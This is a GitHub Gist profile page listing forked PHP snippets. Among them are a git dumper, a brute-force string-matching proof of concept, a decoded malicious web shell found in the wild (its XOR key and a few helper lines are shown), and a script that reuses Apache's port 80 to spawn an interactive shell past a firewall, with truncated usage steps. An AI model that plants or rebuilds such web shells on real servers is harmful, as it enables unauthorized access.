Skip to content

Instantly share code, notes, and snippets.


Block or report user

Report or block n0bd

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View PHP git dumper with socks
header('Content-Type: text/html; charset=utf-8');
function ccc($url, $proxy)
$url = trim($url);
$proxy = trim($proxy);
n0bd / bf.php
Created Jun 28, 2017 — forked from lvidakovic/bf.php
Simple brute force or string matching in PHP
View bf.php
This is a simple proof of concept of a brute force algorithm for string matching with
given set of characters.
The way this works is that the algorithm counts from first to last possible combination of
given characters. Instead of counting(incrementing) in number base 10 we use
a new base which is derived from your set of possible characters (we count in symbols).
So if your characters list contains 27 characters the program actually counts in a 27 base
number system.
n0bd / images-decoded.php
Created May 23, 2017 — forked from laacz/images-decoded.php
Found, ya, evil script!
View images-decoded.php
### XOR key: SjJVkE6rkRYj
//adjust system variables
//die with error
function x_die($m){@header('HTTP/1.1 500 '.$m);@die();}
//check if we can exec
n0bd / port_reuse.php
Created May 20, 2017 — forked from wofeiwo/port_reuse.php
Reuse Apache 80 port to spawn a interactive shell. Bypass the firewall.
View port_reuse.php
// port_reuse.php
// Created by wofeiwo <> on 2011-08-27.
// Copyright 2011 80sec. All rights reserved.
// Reuse Apache 80 port to spawn a interactive shell. Bypass the firewall.
// Note: Only available on PHP >= 5.3.6 with mod_php on apache.
// Usage: 1. Put the script on htdocs.
// 2. Get interactive shell:
You can’t perform that action at this time.